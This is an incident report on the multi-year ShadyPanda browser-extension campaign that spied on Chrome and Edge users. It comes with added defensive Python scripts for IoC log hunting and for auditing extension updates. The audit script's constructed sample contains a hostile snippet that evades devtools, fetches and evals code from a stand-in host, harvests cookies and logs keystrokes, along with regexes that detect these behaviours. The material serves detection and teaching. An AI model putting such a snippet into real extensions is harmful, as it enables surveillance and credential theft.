Full Report
And some are still active in the Microsoft Edge store

A seven-year malicious browser extension campaign infected 4.3 million Google Chrome and Microsoft Edge users with malware, including backdoors and spyware sending people's data to servers in China. And, according to Koi researchers, five of the extensions with more than 4 million installs are still live in the Edge marketplace. …
Analysis Summary
# Incident Report: Seven-Year Malicious Browser Extension Campaign
## Executive Summary
A seven-year malicious browser extension campaign, attributed to the threat group "ShadyPanda," compromised an estimated 4.3 million users across Google Chrome and Microsoft Edge. The operators published legitimate-looking productivity and wallpaper extensions, built an install base and marketplace trust over years, and then shipped malicious updates containing backdoors, spyware, and keystroke logging, exfiltrating browsing data to servers primarily located in China. Google confirmed removal of the affected extensions from the Chrome Web Store, but at the time of Koi's report several of the malicious extensions remained live in the Microsoft Edge store.
## Incident Details
- **Discovery Date:** December 1, 2025 (Date of Public Disclosure by Koi Researchers)
- **Incident Date:** Campaign spanning multiple phases, starting as early as 2018, with active exploitation noted in 2023 and mid-2024.
- **Affected Organization:** End-users of Google Chrome and Microsoft Edge browsers globally.
- **Sector:** Technology / Software Distribution Platforms (Browser Extension Marketplaces).
- **Geography:** Global user base; Data exfiltration targets servers in China.
## Timeline of Events
### Initial Access
- **Date/Time:** Started as early as 2018 (for initial active campaigns); specific malicious updates noted mid-2024.
- **Vector:** Submission and approval of seemingly legitimate productivity extensions or wallpaper apps on the official browser stores (Chrome Web Store and Microsoft Edge Store).
- **Details:** Attackers published extensions, allowed them to gain high numbers of installations and even "Featured" status, creating trust before pushing malicious updates.
### Lateral Movement
- **Details:** Not applicable in the traditional host-to-host sense. There was no movement between machines; instead a single malicious update, delivered through the browser's automatic extension-update mechanism, reached every installed user at once. Once deployed, the extension's host permissions let it inject code into any page the user visited. Because an extension runs inside the browser after TLS has been terminated, HTTPS offers no protection against it: the malicious code sees and can modify page content and requests in the clear.
### Data Exfiltration/Impact
- **Details:** Stolen data included visited URLs, HTTP referrers, activity timestamps, persistent UUID4 identifiers, browser fingerprints, search queries, page interaction data, and cookies. In one major campaign, data was sent to 17 different domains, including 8 Baidu servers in China and 7 dedicated ShadyPanda servers in China.
### Detection & Response
- **Details:** Detected by Koi researchers, who identified the multi-phase campaign by tracing how extensions that had shipped benign versions for years later received malicious updates.
- **Response Actions:** Google confirmed that affected extensions were removed from the Chrome Web Store. However, as of the report date, five high-impact extensions with over 4 million combined installs were still active and live on the Edge marketplace.
## Attack Methodology
- **Initial Access:** Publishing high-trust, seemingly benign browser extensions.
- **Persistence:** The malware persisted simply by remaining an installed, auto-updating extension. Earlier benign version bumps built the install base and marketplace trust; the malicious release rode the same update channel and needed no separate persistence mechanism.
- **Privilege Escalation:** Not a distinct step. The malware operated with the broad permissions the extensions already held (access to all URLs and to cookies). In the *Clean Master* campaign the update added a backdoor giving the operators remote code execution within the extension context, meaning they could push arbitrary code to run with the extension's permissions at any time.
- **Defense Evasion:** Anti-analysis checks: if browser developer tools were detected, the extension switched to benign behavior, hiding the malicious code paths from researchers running it under inspection.
- **Credential Access:** Keystroke logging (the Infinity V+ campaign) and access to stored session data and cookies, which can be replayed to hijack authenticated sessions.
- **Discovery:** Browser fingerprinting and monitoring navigation patterns (HTTP referrers).
- **Lateral Movement:** N/A (Focused on client-side compromise).
- **Collection:** Comprehensive data scraping, including visited URLs, search queries, clicks, and user interaction data.
- **Exfiltration:** Sending collected data in real-time to command-and-control (C2) infrastructure, including numerous servers located in China.
- **Impact:** Complete browser surveillance and data theft.
## Impact Assessment
- **Financial:** Undisclosed. The visible monetization path was affiliate-code injection into eBay, Amazon, and Booking.com links, which earns the operators commissions on victims' purchases; direct losses to users were not quantified.
- **Data Breach:** Personally Identifiable Information (PII), browsing history, site interactions, persistent tracking identifiers (UUID4), and browser configuration data for 4.3 million users.
- **Operational:** Low direct impact on victims' systems beyond possible performance degradation, but high ongoing risk: the backdoors left the operators able to push new code to every infected browser at will.
- **Reputational:** Significant reputational damage to both the affected extension publishers and the integrity of the Microsoft Edge and Google Chrome extension marketplaces.
## Indicators of Compromise
- **Network Indicators (Defanged):** `api.extensionplay[.]com` (C2 API); the 17 exfiltration domains named in Koi's report, including eight Baidu servers and seven ShadyPanda-controlled servers in China.
- **File Indicators:** N/A. The malicious code lived inside the extension packages themselves and ran within the browser's extension context rather than dropping files to disk.
- **Behavioral Indicators:** Hourly check-ins to C2 servers, real-time transmission of browsing data, injection of affiliate tracking codes into shopping links, and redirection of searches (e.g., to `trovi[.]com`).
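The indicators above can be turned into a hunt over proxy or DNS logs. The following script is an added example, not part of Koi's report or any vendor tooling: it refangs the two domains quoted on this page, matches requests to them (including subdomains), and flags clients whose requests to a host recur at a fixed interval, defaulting to the hourly C2 check-in the page describes. The log format, client addresses and timestamps are constructed for the demonstration.

```python
"""Hunt for ShadyPanda-style extension traffic in a web proxy log.

Added example, not part of the original report. The IoC list reuses the
two defanged domains named on the page; the log format, client IPs and
timestamps below are constructed for the demonstration.
"""
from collections import defaultdict
from datetime import datetime

# Defanged indicators as written on the page; "[.]" is refanged before matching.
DEFANGED_IOCS = ["api.extensionplay[.]com", "trovi[.]com"]


def refang(domain: str) -> str:
    """Turn 'example[.]com' into 'example.com'."""
    return domain.replace("[.]", ".")


IOC_DOMAINS = {refang(d) for d in DEFANGED_IOCS}


def host_matches_ioc(host: str) -> bool:
    """True if host equals an IoC domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def parse_line(line: str):
    """Parse the constructed format: 'ISO-8601-timestamp client_ip host path'."""
    ts, client, host, path = line.split(maxsplit=3)
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), client, host, path


def find_ioc_hits(lines):
    """Return (client, host, timestamp) for every request to an IoC domain."""
    hits = []
    for line in lines:
        ts, client, host, _ = parse_line(line)
        if host_matches_ioc(host):
            hits.append((client, host, ts))
    return hits


def find_periodic_beacons(hits, period_s=3600, tolerance_s=120, min_count=3):
    """Flag (client, host) pairs whose requests recur at a fixed interval.

    The page reports hourly C2 check-ins, so the default period is 3600 s.
    A pair qualifies when at least min_count requests are spaced within
    tolerance_s of the period; jitter wider than that is not caught here.
    """
    by_pair = defaultdict(list)
    for client, host, ts in hits:
        by_pair[(client, host)].append(ts)
    beacons = []
    for pair, stamps in by_pair.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        regular = [g for g in gaps if abs(g - period_s) <= tolerance_s]
        if len(regular) + 1 >= min_count:
            beacons.append(pair)
    return sorted(beacons)


# Constructed sample log: one client beacons hourly to the C2 API, another
# is redirected once to the search hijack domain, and benign traffic that
# must not be flagged is mixed in.
SAMPLE_LOG = """\
2025-11-30T08:00:05Z 10.0.0.17 api.extensionplay.com /api/v1/check
2025-11-30T08:00:06Z 10.0.0.17 www.wikipedia.org /wiki/Main_Page
2025-11-30T09:00:11Z 10.0.0.17 api.extensionplay.com /api/v1/check
2025-11-30T09:15:40Z 10.0.0.42 www.trovi.com /?q=tax+software
2025-11-30T10:00:02Z 10.0.0.17 api.extensionplay.com /api/v1/check
2025-11-30T10:30:00Z 10.0.0.42 www.wikipedia.org /wiki/Browser_extension
2025-11-30T11:00:09Z 10.0.0.17 api.extensionplay.com /api/v1/check
""".splitlines()


def analyze(lines=SAMPLE_LOG):
    """Return all IoC hits and the subset that shows periodic beaconing."""
    hits = find_ioc_hits(lines)
    return hits, find_periodic_beacons(hits)


if __name__ == "__main__":
    hits, beacons = analyze()
    for client, host, ts in hits:
        print(f"IOC hit      {client} -> {host} at {ts.isoformat()}")
    for client, host in beacons:
        print(f"hourly beacon {client} -> {host}")
```

Against the constructed log, the single `trovi` hit is reported as an IoC match but not as a beacon, while `10.0.0.17` is flagged for its four hourly check-ins to `api.extensionplay.com`. In a real hunt, seed `DEFANGED_IOCS` with the full domain list from Koi's report and run the periodicity check over all hosts, not just known IoCs, since the page notes the C2 infrastructure was spread across 17 domains.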
## Response Actions
- **Containment Measures:** Koi researchers publicly disclosed the findings, prompting platform intervention. Google confirmed the removal of affected extensions from their store.
- **Eradication Steps:** Manual or automated removal of the malicious extensions by affected users or marketplace administrators.
- **Recovery Actions:** Users must review their installed extensions (chrome://extensions or edge://extensions) and uninstall anything associated with the ShadyPanda campaigns. Because session cookies were among the exfiltrated data, affected users should also sign out of sessions and rotate credentials for accounts used in that browser.
## Lessons Learned
- Marketplace review processes prioritize application submission over continuous monitoring of behavior and subsequent updates, allowing dormant malware to be deployed years after initial approval (e.g., Featured/Verified extensions turning malicious).
- Attackers, "ShadyPanda," successfully employed a "long game" strategy by relying on the trust built over several years.
- Automatic extension updates, while essential for delivering fixes, also mean a single malicious release reaches the entire install base with no user action and no re-review of the trust earned by earlier versions.
## Recommendations
- Browser marketplaces must implement continuous behavioral monitoring of extensions after approval, re-reviewing each update for newly requested permissions, new network destinations, and newly introduced code-execution capabilities such as remote script loading, rather than treating a previously approved extension as trusted.
- Users should exercise extreme caution when installing productivity extensions, regardless of high install counts or "Verified" status, and regularly audit current extensions.
- Developers of extensions should adopt least-privilege principles, requesting only the minimum necessary permissions.
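What a post-approval update review looks like in practice, for the Persistence, Privilege Escalation and Defense Evasion items in the Attack Methodology section and for the first recommendation above, is shown in the following script. It is an added example, not code from Koi, Google or Microsoft: it diffs two versions of a constructed extension and reports newly granted permissions, newly referenced external hosts, and the first appearance of code patterns that turn an extension into a remotely controllable backdoor or that hide behavior from analysts. The manifests, source snippets, host names (`.test` and `.invalid` reserved domains) and the pattern list are all assumptions made for the demonstration.

```python
"""Re-review an extension update rather than only its first submission.

Added example, not code from the original report or any marketplace. It diffs
the manifest grants, the external hosts referenced in source, and the risky
code patterns between two constructed versions of one extension.
"""
import json
import re

# Grants that give an extension reach into every site, cookie or request.
HIGH_RISK_GRANTS = {
    "cookies", "webRequest", "webRequestBlocking", "scripting", "tabs",
    "history", "declarativeNetRequest", "<all_urls>", "*://*/*",
}

# Heuristic source patterns worth a human look when they first appear in an
# update. Each maps to a behavior described in the report.
RISKY_PATTERNS = {
    "dynamic code execution": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    "cookie harvesting": re.compile(r"chrome\.cookies\.getAll\s*\("),
    "keystroke capture": re.compile(r"addEventListener\s*\(\s*['\"]key(?:down|up|press)['\"]"),
    "devtools detection": re.compile(r"outerWidth\s*-\s*(?:window\.)?innerWidth|\bdebugger\b"),
}

HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)


def manifest_grants(manifest: dict) -> set:
    """Flatten MV2 'permissions' and MV3 'host_permissions' into one set."""
    return set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))


def extract_hosts(src: str) -> set:
    """Host names of every absolute http(s) URL literal in the source."""
    return {h.lower() for h in HOST_RE.findall(src)}


def matched_patterns(src: str) -> set:
    return {name for name, rx in RISKY_PATTERNS.items() if rx.search(src)}


def audit_update(old_manifest: dict, old_src: str, new_manifest: dict, new_src: str) -> dict:
    """Report what the new version gained relative to the old one."""
    added = manifest_grants(new_manifest) - manifest_grants(old_manifest)
    return {
        "added_grants": sorted(added),
        "high_risk_added": sorted(added & HIGH_RISK_GRANTS),
        "new_hosts": sorted(extract_hosts(new_src) - extract_hosts(old_src)),
        "new_patterns": sorted(matched_patterns(new_src) - matched_patterns(old_src)),
    }


def severity(findings: dict) -> str:
    """'high' = new reach plus new risky code; 'review' = either; 'ok' = neither."""
    if findings["high_risk_added"] and findings["new_patterns"]:
        return "high"
    if findings["high_risk_added"] or findings["new_patterns"] or findings["new_hosts"]:
        return "review"
    return "ok"


# Constructed sample: a wallpaper extension whose 1.5.0 update widens its
# grants and adds a remotely loaded payload guarded by a devtools check.
OLD_MANIFEST_JSON = json.dumps({
    "manifest_version": 3, "name": "Scenic Wallpapers", "version": "1.4.0",
    "permissions": ["storage"],
    "host_permissions": ["https://wallpapers.example.test/*"],
})
OLD_SRC = """
// v1.4.0 (constructed): fetch a daily wallpaper and store it.
fetch("https://wallpapers.example.test/daily.json")
  .then(r => r.json())
  .then(d => chrome.storage.local.set({wallpaper: d.url}));
"""
NEW_MANIFEST_JSON = json.dumps({
    "manifest_version": 3, "name": "Scenic Wallpapers", "version": "1.5.0",
    "permissions": ["storage", "cookies", "tabs"],
    "host_permissions": ["<all_urls>"],
})
NEW_SRC = OLD_SRC + """
// v1.5.0 (constructed): behave normally when inspected, otherwise load code.
const inspected = (window.outerWidth - window.innerWidth) > 160;
if (!inspected) {
  fetch("https://update-cdn.example.invalid/p.js").then(r => r.text()).then(code => eval(code));
  chrome.cookies.getAll({}, sendCookies);
  document.addEventListener("keydown", logKey);
}
"""


def audit_sample() -> dict:
    """Run the audit over the constructed versions and attach a severity."""
    findings = audit_update(json.loads(OLD_MANIFEST_JSON), OLD_SRC,
                            json.loads(NEW_MANIFEST_JSON), NEW_SRC)
    findings["severity"] = severity(findings)
    return findings


if __name__ == "__main__":
    print(json.dumps(audit_sample(), indent=2))
```

The patterns are deliberately coarse: `eval` and `new Function` have legitimate uses, and a `debugger` keyword can be a leftover. The point of the check is not to convict an update but to route it to a human when an extension that has shipped quietly for years suddenly acquires `<all_urls>`, a new host, and a code-loading path in the same release, which is exactly the shape of the updates described in this report.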